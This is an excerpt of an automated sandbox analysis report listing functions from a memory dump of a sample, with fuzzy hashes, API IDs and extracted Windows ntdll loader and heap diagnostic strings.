                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: bb815392f86aee531ae4c65ac6d6c04e3022e015403b9a8cbc3a415be78cb01f
                                                                                                      • Instruction ID: 50cf55f21918113d3799545d8f0cf69f0b91b193dc8d958d8fb77348afd48e2a
                                                                                                      • Opcode Fuzzy Hash: bb815392f86aee531ae4c65ac6d6c04e3022e015403b9a8cbc3a415be78cb01f
                                                                                                      • Instruction Fuzzy Hash: DDE04F752002147BC610EA5ADC41FDB7B6CDBC5754F00401AFA08A7281C6B5790187F4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 223 1142c0a-1142c0f 224 1142c11-1142c18 223->224 225 1142c1f-1142c26 LdrInitializeThunk 223->225
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: dba909999f6eedaa3c6d7c0f03c52461cd82fe67309f8eceeab1734e858887a3
                                                                                                      • Instruction ID: 51df5e1f68fe0b5a2ecdb307994e9fb93c240db987ca5410b4ebd93c8612a4fa
                                                                                                      • Opcode Fuzzy Hash: dba909999f6eedaa3c6d7c0f03c52461cd82fe67309f8eceeab1734e858887a3
                                                                                                      • Instruction Fuzzy Hash: 3EB09B719015C5C6DB55E7645708717790077D0701F25C061F2130641F4778C1D1E675
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 01182349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2160512332
                                                                                                      • Opcode ID: 7a3a4d6a68cb176733b82a9fe0219aef92aee87dd1f7bc591adefc347a8de12d
                                                                                                      • Instruction ID: c74f28e9324c2d48f8f058eb236482a8236ed9433850122b3e912be90f3f9a0f
                                                                                                      • Opcode Fuzzy Hash: 7a3a4d6a68cb176733b82a9fe0219aef92aee87dd1f7bc591adefc347a8de12d
                                                                                                      • Instruction Fuzzy Hash: EC928071604742AFE72AEF19C840B6BBBE8BB84754F04892DFA95D7250D770E844CF92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01138620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01175543
                                                                                                      • undeleted critical section in freed memory, xrefs: 0117542B
                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011754E2
                                                                                                      • Critical section debug info address, xrefs: 0117541F, 0117552E
                                                                                                      • Address of the debug info found in the active list., xrefs: 011754AE, 011754FA
                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0117540A, 01175496, 01175519
                                                                                                      • corrupted critical section, xrefs: 011754C2
                                                                                                      • double initialized or corrupted critical section, xrefs: 01175508
                                                                                                      • Critical section address., xrefs: 01175502
                                                                                                      • Critical section address, xrefs: 01175425, 011754BC, 01175534
                                                                                                      • Invalid debug info address of this critical section, xrefs: 011754B6
                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011754CE
                                                                                                      • Thread identifier, xrefs: 0117553A
                                                                                                      • 8, xrefs: 011752E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                      • API String ID: 0-2368682639
                                                                                                      • Opcode ID: dbfbdc1d62834fc8b2abfb9429bc21b548139ab6def3c6eb504c1f9139e50503
                                                                                                      • Instruction ID: 87c1c57de1ec13071f9f8b2afd0ffcc3489b52227d7cde1e81868d679e489d2a
                                                                                                      • Opcode Fuzzy Hash: dbfbdc1d62834fc8b2abfb9429bc21b548139ab6def3c6eb504c1f9139e50503
                                                                                                      • Instruction Fuzzy Hash: A181B1B1A40358EFDB68CF9AC845BAEBBF6FB48704F14811AF544BB690D371A940CB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • @, xrefs: 0117259B
                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01172412
                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011722E4
                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01172506
                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01172602
                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01172498
                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011724C0
                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0117261F
                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01172409
                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01172624
                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011725EB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                      • API String ID: 0-4009184096
                                                                                                      • Opcode ID: 8f94c29fed009465d2fb82066915d0d30da7209f75069077107f7cfa868c072e
                                                                                                      • Instruction ID: 0cdb13c0438db5ccb82bf3e4b1b754a6232439bde5de7975805dad90b2ec572e
                                                                                                      • Opcode Fuzzy Hash: 8f94c29fed009465d2fb82066915d0d30da7209f75069077107f7cfa868c072e
                                                                                                      • Instruction Fuzzy Hash: E3028EF1D002299FDB39DB54CC80BDAB7B8AB54704F0141EAA649A7241EB309F85CF99
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                      • API String ID: 0-2515994595
                                                                                                      • Opcode ID: e9456fac12bf28b26eeb9f0d37f5f67c4adaa81bee39604064803961c1c262c1
                                                                                                      • Instruction ID: fa5d65193a7072ab729670868cde2359603bdf677ba117fdedb9863453b970eb
                                                                                                      • Opcode Fuzzy Hash: e9456fac12bf28b26eeb9f0d37f5f67c4adaa81bee39604064803961c1c262c1
                                                                                                      • Instruction Fuzzy Hash: DD51CD755083119BC32DDF18C844BABBFE8EF94649F94492EE998C7284E770D608CBD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                      • API String ID: 0-1700792311
                                                                                                      • Opcode ID: a2ae273c6e324c6524fb6163d2f9596774166f4592ae34925a4cd282e687755c
                                                                                                      • Instruction ID: ee75d759714772a57ecac2ddac0b850811a7f4ea45225d18bd0b073ddc8a6c52
                                                                                                      • Opcode Fuzzy Hash: a2ae273c6e324c6524fb6163d2f9596774166f4592ae34925a4cd282e687755c
                                                                                                      • Instruction Fuzzy Hash: 72D1FC31604A86DFDB2ADF68C481AEEBBF1FF4A714F18805DF5859BA52C7349981CB10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011363FF Relevance: 10.3, Strings: 8, Instructions: 261COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$`,$h=$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-3391357973
                                                                                                      • Opcode ID: 3ef4555fcfdd757692296e5b689304846083bf0035aa964b1dbc46e00a4dd8cd
                                                                                                      • Instruction ID: 2f477dc64db8d289606ef4ff4dcc1168c8f3e15d8ccc4ac22f744ecb5c7cd7ea
                                                                                                      • Opcode Fuzzy Hash: 3ef4555fcfdd757692296e5b689304846083bf0035aa964b1dbc46e00a4dd8cd
                                                                                                      • Instruction Fuzzy Hash: CC914830F01711ABEB2DEF18E844BAE7BB6BF81B58F14012CE9606B785D7709981C791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011889B3 Relevance: 10.3, Strings: 8, Instructions: 259COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01188A67
                                                                                                      • `,, xrefs: 01188A35, 01188A5F
                                                                                                      • VerifierDebug, xrefs: 01188CA5
                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01188B8F
                                                                                                      • VerifierFlags, xrefs: 01188C50
                                                                                                      • HandleTraces, xrefs: 01188C8F
                                                                                                      • VerifierDlls, xrefs: 01188CBD
                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01188A3D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags$`,
                                                                                                      • API String ID: 0-1326338960
                                                                                                      • Opcode ID: c9373861527874a4925a5fd4d4e722406171a74e2d65bb45c918154a9db4b54f
                                                                                                      • Instruction ID: 4165861cc3f54f6437ac8ac57b2fee38bad01c551db5eb03a2199a3292d6babd
                                                                                                      • Opcode Fuzzy Hash: c9373861527874a4925a5fd4d4e722406171a74e2d65bb45c918154a9db4b54f
                                                                                                      • Instruction Fuzzy Hash: 4C914672641716EFD32DFF288880F6A7BE5AB94758F85852CFA40AB285C7309C45CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 010F645D Relevance: 8.9, Strings: 7, Instructions: 150COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$`,$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2254957362
                                                                                                      • Opcode ID: ee4248390b9caa0f34c47049fc44c7a023d3cab02f8fde2c8a012d72bdb38ed3
                                                                                                      • Instruction ID: 0105d6a5b7afee8a44bf9b703e45c45d53e986014c31dc236679d648efa72888
                                                                                                      • Opcode Fuzzy Hash: ee4248390b9caa0f34c47049fc44c7a023d3cab02f8fde2c8a012d72bdb38ed3
                                                                                                      • Instruction Fuzzy Hash: 2C519171218709DFE728DB24C846BAB77E9FB84748F04052DFAA59B150D731E944CBA3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0110EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                      • API String ID: 0-1109411897
                                                                                                      • Opcode ID: cab8013b49d2b5842ddd4102f20633f9351f755bb6aca06f388073a97edbb81c
                                                                                                      • Instruction ID: 3c3c13111c5e64e4058feb24028fe800ccb8aa1f7842a7d5341af349e23a7f88
                                                                                                      • Opcode Fuzzy Hash: cab8013b49d2b5842ddd4102f20633f9351f755bb6aca06f388073a97edbb81c
                                                                                                      • Instruction Fuzzy Hash: 7CA25770E0562ACFDB79CF19C8887A9BBB5AF49304F1442E9D90DA7690DB719E81CF01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01132674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011721BF
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 01172165
                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01172178
                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01172180
                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01172160, 0117219A, 011721BA
                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0117219F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                      • API String ID: 0-861424205
                                                                                                      • Opcode ID: 91341de77713065024127f48def8947872e50e0d650309a56ebd9f24ddd7eaca
                                                                                                      • Instruction ID: 4b803dbda3d26632e8035cce6cb245441c395455d49eb4ee860c9ab7f15d8b83
                                                                                                      • Opcode Fuzzy Hash: 91341de77713065024127f48def8947872e50e0d650309a56ebd9f24ddd7eaca
                                                                                                      • Instruction Fuzzy Hash: BC314B36F402117BF72AAA9A9C45F5B7B78FFE5A90F054059BB046B204D3709A02C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0113C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 011781E5
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01178181, 011781F5
                                                                                                      • LdrpInitializeProcess, xrefs: 0113C6C4
                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01178170
                                                                                                      • LdrpInitializeImportRedirection, xrefs: 01178177, 011781EB
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0113C6C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-475462383
                                                                                                      • Opcode ID: d42cc0efe386cfa8ba285945388ab4f493df8b7d0e3e3925a9796c2e7f445e00
                                                                                                      • Instruction ID: d89eca977d084c413ca2290f6bed91aecf97f7c28e7d046e48d1edc30582131c
                                                                                                      • Opcode Fuzzy Hash: d42cc0efe386cfa8ba285945388ab4f493df8b7d0e3e3925a9796c2e7f445e00
                                                                                                      • Instruction Fuzzy Hash: DD31F7716447469FC21CEF29D84AE1A7BE5EF94B54F04056CF9856B391DB20EC04C7A2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0114096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 01142DF0: LdrInitializeThunk.NTDLL ref: 01142DFA
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01140BA3
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01140BB6
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01140D60
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01140D74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 1404860816-0
                                                                                                      • Opcode ID: c717cc1cbf402d1c37e0fd08505c0535d7e6cb697f6009eda8c739a77c887831
                                                                                                      • Instruction ID: 5f8a9fae589bea6fa889a8234bd27eea2d0d25a7ba87fa1c14510f41d55c7050
                                                                                                      • Opcode Fuzzy Hash: c717cc1cbf402d1c37e0fd08505c0535d7e6cb697f6009eda8c739a77c887831
                                                                                                      • Instruction Fuzzy Hash: 25426C71900719DFDB29CF28C840BEAB7F5BF48714F1445A9EA89EB241E770A984CF61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0110A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                      • API String ID: 0-379654539
                                                                                                      • Opcode ID: 137ed1b1b4559b06d8ac901f47a618df4964f89f59c1220565a70541b24deb4b
                                                                                                      • Instruction ID: 8d9d59ed0fb216b578c021d27dcb41be6d6e679dc181d4c7953549c20ea109f8
                                                                                                      • Opcode Fuzzy Hash: 137ed1b1b4559b06d8ac901f47a618df4964f89f59c1220565a70541b24deb4b
                                                                                                      • Instruction Fuzzy Hash: 11C19B74908382CFD71ACF68D040B6AB7E4BF84704F05896AF995CB291E7B5C949CB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01138402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • @, xrefs: 01138591
                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0113855E
                                                                                                      • LdrpInitializeProcess, xrefs: 01138422
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01138421
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1918872054
                                                                                                      • Opcode ID: 4e8ba1fceae5eb6a269a61dca5daa7137c95f6ab92e0764292e5827f577b2456
                                                                                                      • Instruction ID: 8d90befcd33ba622f1d6cdbad24c0a63a841c611ff55f41ba053b74c08abe7c1
                                                                                                      • Opcode Fuzzy Hash: 4e8ba1fceae5eb6a269a61dca5daa7137c95f6ab92e0764292e5827f577b2456
                                                                                                      • Instruction Fuzzy Hash: 7B91BF71648345AFD72ADF65CC40FABBBE8BF84744F400A2EFA8496145E734D944CB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0113273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 011721DE
                                                                                                      • .Local, xrefs: 011328D8
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011722B6
                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011721D9, 011722B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                      • API String ID: 0-1239276146
                                                                                                      • Opcode ID: 554dc23cbe5ea9089c72dadc5f0aa521907d8d6d4eeea82f491467dac6daa2bd
                                                                                                      • Instruction ID: 19fa4677a29528a8e6955f3208eb65c8ed556f6551a5350811eec772d14d9b9e
                                                                                                      • Opcode Fuzzy Hash: 554dc23cbe5ea9089c72dadc5f0aa521907d8d6d4eeea82f491467dac6daa2bd
                                                                                                      • Instruction Fuzzy Hash: 80A1D031900229DFDB28DF68C884BA9B7B1BF98354F1541EAD948AB355E730DE81CF81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01160FE5
                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011610AE
                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01161028
                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0116106B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
